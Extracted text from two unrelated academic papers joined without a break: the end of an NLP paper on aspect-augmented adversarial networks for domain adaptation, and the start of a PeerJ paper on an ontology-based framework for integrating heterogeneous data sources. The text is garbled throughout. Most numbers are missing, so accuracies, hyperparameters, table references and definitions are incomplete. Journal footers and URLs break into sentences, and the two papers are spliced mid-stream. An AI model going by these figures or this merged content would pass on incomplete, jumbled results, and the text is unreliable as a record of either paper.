baselines and our method. we first compare against a linear svm trained on the raw bag-of-words representation of the labeled source data. second, we compare against our sourceonly model, which assumes no target-domain data or keywords and thus has no adversarial training or target aspect-relevance scoring. next we compare with marginalized stacked denoising autoencoders (msda) (chen et al., ), a domain adaptation algorithm that outperforms both prior deep learning and shallow learning approaches; we use the publicly available implementation provided by the authors at http://www.cse.wustl.edu/~mchen/code/msda.tar with the authors' hyper-parameters, and their models have more parameters than ours. in the rest of the paper, we name our method and its variants aan (aspect-augmented adversarial networks). we compare against aan-na and aan-nr, our model variants without adversarial training and without aspect-relevance scoring, respectively. finally, we include supervised models trained on the full set of in-domain annotations as the performance upper bound. table [3] summarizes the usage of labeled and unlabeled data in each domain, as well as keyword rules, by our model (aan-full) and the different baselines. note that our model assumes the same set of data as the aan-na, aan-nr and msda methods.

table [3]: usage of labeled (lab.) and unlabeled (unlab.) data and keyword rules in each domain by our model and other baseline methods. aan-* denote our model and its variants.

method | source lab. | source unlab. | target lab. | target unlab. | keyword
svm | x | × | × | × | ×
sourceonly | x | x | × | × | x
msda | x | x | × | x | ×
aan-na | x | x | × | x | x
aan-nr | x | x | × | x | ×
in-domain | × | × | x | × | x
aan-full | x | x | × | x | x

implementation details. following prior work (ganin and lempitsky, ), we gradually increase the adversarial strength ρ and decay the learning rate during training. we also apply batch normalization (ioffe and szegedy, ) on the sentence encoder and apply dropout with a ratio of . on word embeddings and on each hidden layer activation. we set the hidden layer size to and pick the transformation regularization weight λt = . for the pathology dataset and λt = . for the review dataset.

table [4]: pathology: classification accuracy (%) of different approaches on the pathology reports dataset, including the results of twelve adaptation scenarios from four different aspects (idc, alh, dcis and lcis) in breast cancer pathology reports. "msda" indicates the marginalized denoising autoencoder in (chen et al., ). "aan-na" and "aan-nr" correspond to our model without the adversarial training and without the aspect-relevance scoring component, respectively. we also include in the last column the in-domain supervised training results of our model as the performance upper bound. boldface numbers indicate the best accuracy for each testing scenario.
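the ramp-up of the adversarial strength ρ and the learning-rate decay mentioned in the implementation details above follow ganin and lempitsky's domain-adversarial training recipe. the snippet below is our own sketch of that style of schedule; the constants are the ones reported in that prior work and are assumptions here, not values taken from this paper.

```python
# illustrative schedules for adversarial strength and learning rate
# (our sketch; constants follow Ganin & Lempitsky's recipe, not this paper's values)
import math

def adversarial_strength(progress: float, gamma: float = 10.0) -> float:
    """Ramp rho from 0 toward 1 as training progress goes from 0 to 1."""
    return 2.0 / (1.0 + math.exp(-gamma * progress)) - 1.0

def learning_rate(progress: float, lr0: float = 0.01,
                  alpha: float = 10.0, beta: float = 0.75) -> float:
    """Decay the learning rate as training progresses."""
    return lr0 / (1.0 + alpha * progress) ** beta

for step, total in [(0, 100), (25, 100), (50, 100), (100, 100)]:
    p = step / total
    print(f"p={p:.2f}  rho={adversarial_strength(p):.3f}  lr={learning_rate(p):.4f}")
```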
main results

table [4] summarizes the classification accuracy of different methods on the pathology dataset, including the results of twelve adaptation tasks. our full model (aan-full) consistently achieves the best performance on each task compared with the other baselines and model variants. it is not surprising that svm and msda perform poorly on this dataset, because they only predict labels based on an overall feature representation of the input and do not utilize the weak supervision provided by aspect-specific keywords. as a reference, we also provide a performance upper bound by training our model on the full labeled set in the target domain, denoted as in-domain in the last column of table [4]. on average, the accuracy of our model (aan-full) is only . % behind this upper bound.

table [5] shows the adaptation results from each aspect in the hotel reviews to the overall ratings of restaurant reviews. aan-full and aan-nr are the two best performing systems on this review dataset, attaining around % improvement over the msda baseline. below, we summarize our findings when comparing the full model with the two model variants aan-na and aan-nr.

table [5]: review: classification accuracy (%) of different approaches on the reviews dataset, for adaptation from each hotel aspect (value, room, checkin, service, cleanliness) to the overall restaurant rating. columns have the same meaning as in table [4]. boldface numbers indicate the best accuracy for each testing scenario.

impact of adversarial training. we first focus on comparisons between aan-full and aan-na. the only difference between the two models is that aan-na has no adversarial training. on the pathology dataset, our model significantly outperforms aan-na, yielding a . % absolute average gain (see table [4]). on the review dataset, our model obtains a . % average improvement over aan-na. as shown in table [5], the gains are more significant when training on the room and checkin aspects, reaching . % and . %, respectively.

impact of relevance scoring. as shown in table [4], the relevance scoring component plays a crucial role in classification on the pathology dataset: our model achieves more than % improvement over aan-nr. this is because, in general, aspects have zero correlation to each other in pathology reports, so it is essential for the model to have the capacity to distinguish across different aspects in order to succeed in this task. on the review dataset, however, we observe that relevance scoring has no significant impact on performance. on average, aan-nr actually outperforms aan-full by . %. this observation can be explained by the fact that different aspects in hotel reviews are highly correlated to each other. for example, the correlation between room quality and cleanliness is . , much higher than the aspect correlations in the pathology dataset. in other words, the sentiment is typically consistent across all sentences in a review, so selecting aspect-specific sentences becomes unnecessary. moreover, our supervision for the relevance scorer is weak and noisy because the aspect keywords are obtained in a semi-automatic way. it is therefore not surprising that aan-nr sometimes delivers a better classification accuracy than aan-full.

figure [4]: heat maps of document representation matrices for three variants: (-adversarial, -reconstruction), (+adversarial, -reconstruction) and (+adversarial, +reconstruction). each row corresponds to the vector representation of a document that comes from either the source domain (top half) or the target domain (bottom half). models are trained on the review dataset with room quality as the source aspect.

table [6]: impact of adding the reconstruction component in the model, measured by the average accuracy on each dataset for aan-full and aan-na, each with (+rec.) and without (-rec.) the reconstruction loss.

analysis

impact of the reconstruction loss. table [6] summarizes the impact of the reconstruction loss on the model performance. for our full model (aan-full), adding the reconstruction loss yields an average of . % gain on the pathology dataset and . % on the review dataset.
to analyze the reasons behind this difference, consider figure [4], which shows the heat maps of the learned document representations on the review dataset. the top half of each matrix corresponds to input documents from the source domain and the bottom half corresponds to the target domain. unlike the first matrix, the other two matrices have no significant difference between the two halves, indicating that adversarial training helps the learning of domain-invariant representations. however, adversarial training also removes a lot of information from the representations, as the second matrix is much sparser than the first one. the third matrix shows that adding the reconstruction loss effectively addresses this sparsity issue: almost % of the entries of the second matrix have very small values, while the sparsity is only about % for the third one. moreover, the standard deviation of the third matrix is also ten times higher than that of the second one. these comparisons demonstrate that the reconstruction loss function improves both the richness and the diversity of the learned representations. note that in the case of no adversarial training (aan-na), adding the reconstruction component has no clear effect. this is expected, because the main motivation for adding this component is to achieve a more robust adversarial training.

figure [5]: examples of restaurant reviews and their nearest neighboring hotel reviews induced by different models, with one column of restaurant reviews, one column of nearest hotel reviews under aan-full (ours-full) and one under aan-na (ours-na). we use room quality as the source aspect; the sentiment phrases of each review are in blue, and some reviews are shortened for space. for instance, a restaurant review complaining that "the fries were undercooked ... even the water tasted weird" is matched by aan-full to hotel reviews with room-quality complaints such as "in the second bedroom it literally rained water from above", but by aan-na to reviews with food-related or generic sentiment such as "i was very ill with what was suspected to be food poison".

table [7]: the effect of the regularization weight λt of the transformation layer on performance, comparing λt = 0, 0 < λt < ∞, and λt = ∞ on each dataset.

regularization on the transformation layer. table [7] shows the averaged accuracy with different regularization weights λt in equation (5). we change λt to reflect different model variants.
first, λt = ∞ corresponds to the removal of the transfor- mation layer because the transformation is always identity in this case. our model performs better than this variant on both datasets, yielding an average improvement of . % on the pathology dataset and . % on the review dataset. this result indicates the importance of adding the transformation layer. sec- ond, using zero regularization (λt = ) also consis- tently results in inferior performance, such as . % loss on the pathology dataset. we hypothesize that zero regularization will dilute the effect from re- construction because there is too much flexibility in transformation. as a result, the transformed repre- sentation will become sparse due to the adversarial training, leading to a performance loss. examples of neighboring reviews finally, in figure we illustrate a case study on the charac- teristics of learned abstract representations by dif- ferent models. the first column shows an example restaurant review. sentiment phrases in this example are mostly food-specific, such as “undercooked” and “tasted weird”. in the other two columns, we show example hotel reviews that are nearest neighbors to the restaurant reviews, measured by cosine simi- larity between their representations. in column , many sentiment phrases are specific for room qual- ity, such as “old” and “rained water from above”. in column , however, most sentiment phrases are either common sentiment expressions (e.g. dirty) or food-related (e.g. food poison), even though the focus of the reviews is based on the room quality of hotels. this observation indicates that adversar- ial training (aan-full) successfully learns to elim- inate domain-specific information and to map those domain-specific words into similar domain-invariant figure : classification accuracy (y-axis) on two transfer scenarios (one on review and one on pathol- ogy dataset) with a varied number of keyword rules for learning sentence relevance (x-axis). representations. in contrast, aan-na only captures domain-invariant features from phrases that com- monly present in both domains. impact of keyword rules finally, figure shows the accuracy of our full model (y-axis) when trained with various amount of keyword rules for relevance learning (x-axis). as expected, the trans- fer accuracy drops significantly when using fewer rules on the pathology dataset (lcis as source and alh as target). in contrary, the accuracy on the re- view dataset (hotel service as source and restaurant as target) is not sensitive to the amount of used rel- evance rules. this can be explained by the observa- tion from table that the model without relevance scoring performs equally well as the full model due to the tight dependence in aspect labels. conclusions in this paper, we propose a novel aspect-augmented adversarial network for cross-aspect and cross- domain adaptation tasks. experimental results demonstrate that our approach successfully learns invariant representation from aspect-relevant frag- ments, yielding significant improvement over the msda baseline and our model variants. the effec- tiveness of our approach suggests the potential ap- plication of adversarial networks to a broader range of nlp tasks for improved representation learning, such as machine translation and language genera- tion. acknowledgments the authors acknowledge the support of the u.s. army research office under grant number w nf- - - . 
we thank the mit nlp group, the tacl action editor hal daumé iii, and the anonymous reviewers for their comments. any opinions, findings, conclusions, or recommendations expressed in this paper are those of the authors, and do not necessarily reflect the views of the funding organizations.
submitted september
accepted january
published march
corresponding author lerina aversano, aversano@unisannio.it
academic editor sebastian ventura
additional information and declarations can be found on page
doi . /peerj-cs.
copyright fusco and aversano
distributed under creative commons cc-by .
open access

an approach for semantic integration of heterogeneous data sources
giuseppe fusco and lerina aversano
department of engineering, university of sannio, benevento, bn, italy

abstract
integrating data from multiple heterogeneous data sources entails dealing with data distributed among heterogeneous information sources, which can be structured, semi-structured or unstructured, and providing the user with a unified view of these data. thus, in general, gathering information is challenging, and one of the main reasons is that data sources are designed to support specific applications. very often their structure is unknown to the large part of users.
moreover, the stored data is often redundant, mixed with information only needed to support enterprise processes, and incomplete with respect to the business domain. collecting, integrating, reconciling and efficiently extracting information from heterogeneous and autonomous data sources is regarded as a major challenge. in this paper, we present an approach for the semantic integration of heterogeneous data sources, dif (data integration framework), and a software prototype to support all aspects of a complex data integration process. the proposed approach is an ontology-based generalization of both global-as-view and local-as-view approaches. in particular, to overcome problems due to semantic heterogeneity and to support interoperability with external systems, ontologies are used as a conceptual schema to represent both the data sources to be integrated and the global view.

subjects data science, databases, emerging technologies
keywords data integration, heterogeneous data sources, semantic integration, ontologies

introduction
given the large availability of data within the enterprise context, and even in inter-enterprise contexts, the problem arises of managing information sources that do not use the same technology, do not have the same data representation, or have not been designed according to the same approach. thus, in general, gathering information is a hard task, and one of the main reasons is that data sources are designed to support specific applications. very often their structure is unknown to the large part of users. moreover, the stored data is often redundant, mixed with information only needed to support enterprise processes, and incomplete with respect to the business domain. collecting, integrating, reconciling and efficiently extracting information from heterogeneous and autonomous data sources is regarded as a major challenge. over the years, several data integration solutions have been proposed:
• distributed databases can be considered the first attempt to integrate databases. data, instead of being stored on a single machine, is stored on different machines. compared to the centralized case, database schemas are more complicated by the need to physically distribute data over multiple machines. distributed databases require the complete integration of existing systems into a single homogeneous database. this is difficult to achieve due to technical issues (prohibitive conversion costs) and organizational difficulties (existing dbmss belong to different organizations).
• federated databases have been proposed to address these limits. they are a set of multiple independent sources, each of which can exchange information with the others. a connection is established for each pair of sources, and such an architecture is particularly suitable when communications in the system occur predominantly between pairs of sources.
figure architecture of a generic mediation system.
the solution often adopted consists of cooperative information systems (fig.
), in which there are two types of components: mediator and wrapper. the mediator coordinates the data flow between local sources and user applications. the mediator is not responsible for storing data, since it only stores a virtual and global view of real data (or global schema) and the mappings between the global and local views. in this way, applications will run queries over the virtual view. it will then be the mediator to build queries for individual sources of information. instead, wrappers are software components that interact directly with their respective local sources as follows: • to translate the conceptual schema of the local source into a global language; • to submit queries to local sources; • to retrieve results by sending them to the mediator, which will provide the user with a unified result. this approach allows provide users with a unified interface (called mediated schema or global schema or global view) of sources, freeing them from manually managing each source. the open research problem is the need of a not statically constructed mediator, but the need of querying mediator responsible of accessing heterogeneous and dynamic data sources trough a global view without integrating or migrating the local data source. to overcome this research problem, this paper proposes an ontology based framework to support the analysis, acquisition and processing of data from heterogeneous sources, data fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. integration framework (dif). it exploits domain ontology and provides a generalization of both global view and local view approaches, based on data virtualization. the proposed framework addresses this issue by providing access to the data layer, consisting of autonomous data sources (e.g., dbs, spreadsheets), through the mediation of a global domain view, given in terms of an ontology, and the use of a semiautomatic mapping between the data layer and the ontology. users do not have to know details of the data sources and can express their information needs as queries over the conceptual domain model. the proposes framework uses the ontology and mapping to reformulate the user queries into standard db queries that are executed directly by the database management systems (dbmss) of the sources. the global view provides a unified view of real data, so that applications and users who use data will have the perception of accessing a single data source rather than multiple sources. in this context, the work faced aspects of acquisition, integration and processing of heterogeneous data sources. the paper is organized as follows. ‘aspects of a data integration process’, ‘related work’ presents, respectively, problems that characterize data integration and proposed solutions in the state of the art. ‘data integration framework’ presents in detail the approach and architecture of the software system developed to support the integration of heterogeneous sources. ‘dif supporting tool’ presents the dif tool design and the main algorithms implemented. ‘case study’ presents a case study in order to show the results of the proposed solution. finally, ‘conclusion’ concludes this paper by submitting concluding remarks and mentioning some research issues related to data integration that are not addressed in this paper. aspects of a data integration process data integration systems using the mediation approach are characterized by an architecture (fig. 
) based on a global schema and a set of sources schema. the sources contain real data, while the global scheme provides a unified, integrated and reconciled view of local sources. the main components are: the mediator, which coordinates data flow between local sources and user applications, and wrappers, which directly interact with their respective local sources. designing a data integration system is a complex task, which involves dealing with different issues. the first issue is related to the heterogeneity of the sources, as sources adopt different models and data storage systems. this poses problems in defining the schema/global view. the purpose is to provide a view with an appropriate level of abstraction for all data in the sources. the second issue is how to define mappings between global schema and local sources: in literature, in order to model the correspondences between the schemes, different approaches (lenzerini, ) have been proposed as global-as-view and local-as-view. with global-as-view (gav) approach the global schema is expressed in terms of views over data sources. with local-as-view (lav) approach the global schema is specified independently of the sources, and the relationships between global schema and sources are established by defining each source as a view built over the global schema. differences fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure matching process. full-size doi: . /peerjcs. /fig- figure merging process. full-size doi: . /peerjcs. /fig- between the two approaches are discussed in lenzerini ( ). in order to overcome the limits of gav and lav approaches, techniques that combine the benefits of these approaches have also been proposed, mitigating their disadvantages in order to provide an alternative to data integration that is more flexible and scalable. the most interesting techniques are glav (global and local as view) (katsis & papakonstantinou, ; arens et al., ) and bglav (byu global local as view) (xu & embley, ). once the mapping approach is defined, it is necessary to define the methods and techniques to be used to generate mappings between the global and the local schema. this activity is called schema matching. the set of mappings is called alignment. a matching process (shvaiko & euzenat, ) (fig. ) defines an alignment (a ′ ) for each pair of schemas (o , o ), making use of input parameters p if necessary (for example, thresholds, weights), a previously generated input alignment (a) and additional external resources r. we can now generate the global schema based on mappings defined in the schema matching activity. this activity is called schema merging. a merging process (fig. ) consists of integrating several existing schemes (o ,o ,...,on) into a single global schema (o) based on the correspondences generated by the schema matching process a, any input parameters p and external resources r. different techniques and methodologies about schema merging have been proposed in the literature (lee & ling, ; fong et al., ; chiticariu, kolaitis & popa, ; kong, hwang & kim, ). fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison between gav and lav. 
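to make the matching step concrete, the following python sketch builds an alignment for a pair of schemas from element-name similarity alone. it only illustrates the (id, es, et, n, rel) mapping structure and the role of a threshold parameter; it is not the semantic and contextual matcher used by dif, and the element names below are invented.

```python
# minimal sketch of a matching process: given two schemas (here just lists of
# element names), produce an alignment, i.e., a set of mappings
# (id, source element, target element, confidence, relation).
# illustrative name-based matcher only, not the matcher implemented by dif.
from difflib import SequenceMatcher
from uuid import uuid4

def match_schemas(source_elements, target_elements, threshold=0.8):
    """return an alignment between two schemas using string similarity."""
    alignment = []
    for es in source_elements:
        for et in target_elements:
            confidence = SequenceMatcher(None, es.lower(), et.lower()).ratio()
            if confidence >= threshold:
                alignment.append({
                    "id": str(uuid4()),
                    "source": es,
                    "target": et,
                    "n": round(confidence, 2),
                    "rel": "equivalence",  # a richer matcher may also emit subsumption, etc.
                })
    return alignment

# example: matching a local schema against a (partial) global schema
local_schema = ["Hospital", "Operating_Room", "Supplier"]
global_schema = ["Hospital", "Surgery", "Person"]
for m in match_schemas(local_schema, global_schema, threshold=0.8):
    print(m)
```

the merging step would then consume such an alignment, after validation by the integration designer, to extend the global schema incrementally.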
gav lav mapping global schema expressed in terms of views over data sources data sources expressed in terms of views over global schema query processing query unfolding query rewriting/query answer- ing global schema quality exact or sound complete or exact management effort high: data source changes af- fect the global schema and other sources low: data source changes only impact the global schema another issue is related to data storage: compared to managed data there are two approaches, called materialization and virtualization. with materialization, data is also present in the global schema. on the opposite, in the virtualization approach, data that resides in sources is only available when query processing activity is executed. once we merged local views into one unified global view, we can process a query posed over the global schema. this activity is called query processing, that is how to express it in terms of a set of queries that can be processed by the sources acquired. in the lav approach the proposed solutions consist of query rewriting (or view-based query rewriting) and query answering (or view-based query answering). in the gav approach query unfolding techniques are used. the differences between the two approaches are discussed in lenzerini ( ). once the query processing activity is performed, data from different sources need to be interpreted, that is, transformed into a common representation. therefore, they must be converted, reconciled and combined. table summarizes the approaches used in mappings definition between the global schema and local ones. based on the comparison approaches in table it is possible to observe that: • the lav approach involves a priori presence of a global schema, which must be well-built in terms of concepts and relationships between them. if it is not well-built, or the integrated schemas differ greatly from each other, the global schema must be continually modified, also taking into account the previously integrated data sources. if not, the changes affect only the global schema. • with gav approach, the global schema is incrementally built: it is modified every time a new data source is integrated, adding and/or modifying concepts and relationships based on current and previously integrated data sources. conversely, in the lav case, changes do not impact previous integrated data sources (if the overall schema is well-built). • the lav approach offers greater scalability when the number of integrated data sources increases, but when that number is relatively small, and the global schema is not well-built, the gav approach increases the quality of global schema. moreover, in the context of semantic integration, the hybrid approach is surely the best solution but it reduces the reuse of local ontologies, since they have to refer to a common vocabulary. therefore, considering a possible future reuse of local the ontologies, it is fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. possible to combine the presented approaches differently in order to support different cases and to present a data integration approach in order to provide different solutions as needed. the proposed approach, called dif is based on these observations and seeks to combine the gav and lav approaches, exploiting ontologies to reach the goals. 
related work several systems, methodologies and approaches have been proposed in literature to support data integration from heterogeneous sources, also based on ontologies (calvanese, lembo & lenzerini, ). to overcome problems due to semantic heterogeneity, it is useful to use ontologies (wache et al., ). depending on how ontologies are used, data integration systems can adopt different approaches, such as single ontology (adopted in sims (arens et al., ; arens, hsu & knoblock, )), multiple ontology (adopted in observer (mena et al., b; mena et al., a)) and hybrid (adopted in kraft (preece, hui & gray, ; preece et al., ) and coin (goh et al., )). more recently in civili et al. ( ) it is proposed mastro studio, a java tool for ontology- based data access (obda). mastro manages obda systems in which the ontology is specified in a logic specifically tailored to ontology-based data access and is connected to external data management systems through semantic mappings that associate sql queries over the external data to the elements of the ontology. tsimmis (the stanford-ibm manager of multiple information sources) (chawathe et al., ) is based on an architecture that exposes a wrapper hierarchy (called translators) and mediators. tsimmis approach is global-as-view. wrappers convert data to a common data model called oem (object exchange model) and mediators combine and integrate them. the global scheme consists of a set of oem objects exported by wrappers to mediators. mediators are specified using a language called mediator specificaion language (msl). queries are expressed in msl or in a specific language called lorel (lightweight object repository language), an object-oriented extension of sql. each query is processed by a module, the mediator specification interpreter (msi). it should be emphasized that tsimmis does not implement a real integration, as each mediator performs integration independently of each other. it means that does not exist the concept of a unified global scheme. the result of a query could be seen inconsistent and completely different from other mediators. this form of integration is called query-based. garlic integration system is based on an architecture with data repositories at lowest level, which represent the data sources. above each data repository we find a wrapper (called repository wrapper), which is responsible for communication between a data repository and the rest of the system. in addition, each wrapper ensures the transformation of the local schema of a source into a unified schema and transforming user queries into queries executable by data source. the global schema has an object-oriented data model, managed by the query services and runtime system components, and stored in the metadata repository, based on the fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. odmg standard. odmg objects are exported by wrappers using garlic data language (gdl), based on the odl (object definition language) standard. unlike the tsimmis system, there is no mediator concept in garlic, and the integration of odmg objects from different sources is performed by wrappers. momis (mediator environment for multiple information sources) (orsini et al., ; beneventano & bergamaschi, ) is a data integration system that manages structured and semistructured data sources. momis is based on i architecture (hull & king, ), consisting of several wrappers and a mediator. 
the integration methodology starts with an extraction activity where user uses a wrapper that transforms the structure of a data source into a odli (object definition language) model based on descriptive logic. the integration process generates an integrated view of data sources using global-as-view approach, building the global schema incrementally. at the end of the momis integration process, starting when the query is posed by the user over the global schema, the mediator generates a oqli query and sends it to wrappers, which translate it into a query executable from the corresponding data source. ontology-based data access is by now a popular paradigm which has been developed in recent years to overcome the difficulties in accessing and integrating legacy data sources (xiao et al., ). in obda, users are provided with a high level conceptual view of the data in the form of an ontology that encodes relevant domain knowledge. the concepts and roles of the ontology are associated via declarative mappings to sql queries over the underlying relational data sources. hence, user queries formulated over the ontology can be automatically rewritten, taking into account both ontology axioms and mappings, into sql queries over the sources. overall, the large part of the analysed approaches, use their own description language, for both local and global schemas, and queries. however, if a generic external application wants to communicate with one of the systems presented, it should know the specific query language and/or the specific language used to describe the schemas. the problem of translation between languages is widened if we consider interoperability with the web. for this reason, the proposed approach, data integration framework (dif), exploits the use of ontologies supported by a semiautomatic mapping strategy. data integration framework the proposed data integration framework, is a generalization of both gav and lav approaches, based on data virtualization, and provides the possibility to define a mappings in both gav approach (a correspondence between a view expressed in terms of the global schema and a view expressed in terms of the local schema) and lav approach (correspondence between a view expressed in terms of the local schema and a view expressed in terms of the global schema). in addition, to overcome problems due to semantic heterogeneity and to support interoperability with external systems, ontologies are used as a conceptual schema to represent both data sources to be integrated and the global schema, and therefore each mapping is defined as a correspondence between elements of ontologies: concepts (or classes), datatype properties, and object properties. since the fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. data virtualization approach is also used to define local ontologies, the construction of an ontology to represent a local source is guided by additional mappings, called source- mappings, defined as correspondences between elements of local ontology and elements that characterize the source itself (for example, for a relational source a mappings will be defined as a correspondence between an ontology concept and the table that represents it). in the proposed solution, the query rewriting is used to reformulate a query posed over the global ontology into a set of queries posed over the local ontologies. this is due to the choice of using ontologies also to describe data sources to be integrated. 
in this way, though, the mediation process is not completed yet, since local ontologies do not contain real data. to complete the mediation process, a second query translation task is required to reformulate a query posed over the local ontology into a set of queries posed over the corresponding source. definition . (data integration framework) the data integration framework dif is a -uple (og,ol,a,mt,sml) where: - og is the global ontology, expressed in a log logic. - ol is the local ontology, expressed in a los logic. - a (alignment) is a set of mappings m ,m ,...,mn between ontologies og and ol. each mapping mi is a -uple (id,es,et,n,rel) where: - id is the unique mapping identifier; - es and et , respectively, are the elements of the source ontology os and target ot . in the case of a gav mapping type, os represents the local ontology and ot the global one, vice versa in the case of a lav mapping type; - n is a measure of confidence (typically within a range [ , ]) that indicates the similarity between es and et ; - rel is a relationship between es and et (for example, equivalence, subsumption, disjunction). - mt (mapping table) is a table whose rows represent an element eg of the global ontology og and columns represent elements el ,el ,...,eln of the local ontology ol that are mapped to eg . - sml (source mapping list) is a set of mappings sm ,sm ,...,smn between the local ontology ol and the correspondent data source si. each mapping smi, called source- mapping, is a triple (id,srck,dsth) where: - id is the unique mapping identifier; - srck is a source element of the local ontology ol. - dsth is a destination element of the local data source si (for example, a table of a relational source). the framework must be able to handle both the integration process and the mediation process, which is shown in fig. , making activities as automated as possible. the integration process is divided into the following activities: fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure overview of integration and mediation processes. full-size doi: . /peerjcs. /fig- . source wrapping: for each source you want to integrate, you build an ontology to describe it. in addition, source-mappings are defined between the ontology and the data source, which will be subsequently used during the mediation process. . schema matching: for each local ontology, mappings are generated between it and global ontology. the matching activity generates mappings between a source ontology and a target one. therefore, considering as target ontology the local one, it is possible to generate lav mappings. conversely, the followed approach will be gav. mappings are eventually validated or modified by the integrator designer. if the number of data sources to be integrated is , global and local ontologies are the same. . schema merging: each local ontology, taking into account the set of mappings defined in the previous activity, is integrated into the global ontology and the mapping table is updated. at this stage, global ontology is built incrementally. the mediation process, however, following a query submission, is divided into the following phases: . global query processing: a query posed over the global ontology is reformulated, through rewriting, into a set of queries posed over local ontologies, using the mapping table generated at the end of the integration process; fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. 
/ https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure overview of dif supporting tool: (a) integration approach and (b) uml diagram. full-size doi: . /peerjcs. /fig- . local query processing: each local query is reformulated into a set of queries over the corresponding data source, using source-mappings generated in the source wrapping activity. this set of queries, once executed, allows you to retrieve the real data. . data reconciliation: extracted data from the previous activity is reconciled and combined before being presented to the user. local and global ontologies are expressed in owl-dl (https://www.w .org/tr/owl- features/), whose basic elements are classes c, object properties op and datatype properties dp. instances i are not considered mapping because the data management approach is virtualization rather than materialization. dif supporting tool the tool, designed and developed to support the dif framework, presents the typical architecture of integration systems based on the mediation approach (fig. ), providing two main components: mediator and wrapper. according to definition . and the description of the activities to be performed during integration and mediation processes, the architecture is composed by acquisition, integration and mediation subsystems. source wrapping data sources that the framework allows to integrate are structured and semi-structured (in particular, spreadsheet, json, and xml data sources). the source wrapping activity is performed by a class that implements the iwrapper interface. the output of this activity, fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://www.w .org/tr/owl-features/ https://www.w .org/tr/owl-features/ http://dx.doi.org/ . /peerj-cs. for each data source s, is a pair (o,sml) composed by the local ontology o, which describes the data source s, and the associated source mapping list sml. relational data sources integration the system allows the integration of relational data sources via jdbc connection (http://www.oracle.com/technetwork/java/javase/tech/index-jsp- .html) and supported databases are: mysql, postgresql, h , db , microsoft sql server, oracle, telid and monetdb. relational data sources are connected to the framework by defining r rml (https://www.w .org/tr/r rml/) mappings. each r rml mapping therefore represents a source-mapping, according with definition . . local ontology is generated by identifying conditions associated to the database tables (ghawi & cullot, ) and, through identified conditions, associating each database element (table, column) to the corresponding ontology (class, datatype property, object property). in addition to r rml mapping, you can use a more compact notation, called axiom mapping, consisting of three elements: • mappingid: mapping identifier; • source: a sql query posed over the database; • target: rdf triple containing variables that refer to the names of the columns mentioned in the source query. each source source mapping sm(id,srck,dsth) (definition . , contained in the source mapping list sml, contains an owl resource (or local schema element) srck and an r rml mapping (or an axiom mapping) dtsh. spreadsheet data sources integration spreadsheet data sources are integrated with a new approach that seeks to examine the internal structure of the tables in order to extract an ontology that reflects as much as possible the data source. 
the approach is divided into several phases: . source scanning: the spreadsheet file is scanned in order to locate tables. at the end of the scan, a text string that describes the table structure is produced. . parsing: the text string is parsed in order to generate the ontology elements, the relationships between them, and the physical location of cells within the spreadsheet data source. the output of this step is a list of schema attribute tables. . analysis: an analysis of the list of attribute tables built to the previous step is performed to aggregate attributes with the same name in different concepts. . restructuring: the generated ontology is refined in order to improve its quality. each source-mapping sm(id,srck,dsth) contained the source mapping list sml (definition . ) contains an owl resource (or local schema element) srck and a data structure to track cells within the spreadsheet data source dtsh. xml data sources integration xml data sources integration is based on its xsd schema (ghawi & cullot, ). if the xml schema does not exist, it is generated. possible mappings are: fusco and aversano ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://www.oracle.com/technetwork/java/javase/tech/index-jsp- .html https://www.w .org/tr/r rml/ http://dx.doi.org/ . /peerj-cs. • class mapping: xml nodes mapped as classes are complex types and element-group declarations (if they contain complex types). the xml schema supports two inheritance mechanisms (extensions and restriction), which are also mapped as classes. • property mapping: if an xml node has a simple type, or is an attribute-group declaration, or is an element-group declaration without additional associated complex types, it is mapped as properties, and its domain is the class corresponding to the parent node. attributes are treated as simple types. in ghawi & cullot ( ), instead, all element-groups and attributes-groups are mapped as classes. • relation mapping: if an element is a complex type and contains another element, whose type is also complex, a relationship is created between the respective classes. the algorithm, in the ontology generation step, receives the xsg graph of the xml schema (xml schema graph) input. starting from the root node, a deep visit is performed, generating an xpath expression for each visited node. each source-mapping sm(id,srck,dsth) contained the source mapping list sml (definition . ) contains an owl resource (or local schema element) srck and the xpath expression dtsh. schema maching the goal of schema matching activity is to generate a set of mapping between local and global ontologies, which will then be validated by the user. the adopted approach generates mappings between classes, considering both semantic and contextual characteristics. before to execute schema matching, a semantic annotation activity of ontologies is performed, whose output is a set of annotations an , one for each ei element of the schema, where each annotation ani is a triple (toki,posi,sensei) consisting of: • toki: the token associated with the element ei; • posi: the lexical category of the token toki; • sensei: the meaning associated with toki token for the lexical category posi, obtained as the output of the disambiguation process. in the semantic matching task, a semantic-based matcher is applied to all pairs (cgi,clj), where cgi is the i-th class of the global schema, while clj is the j-th class of the local schema. 
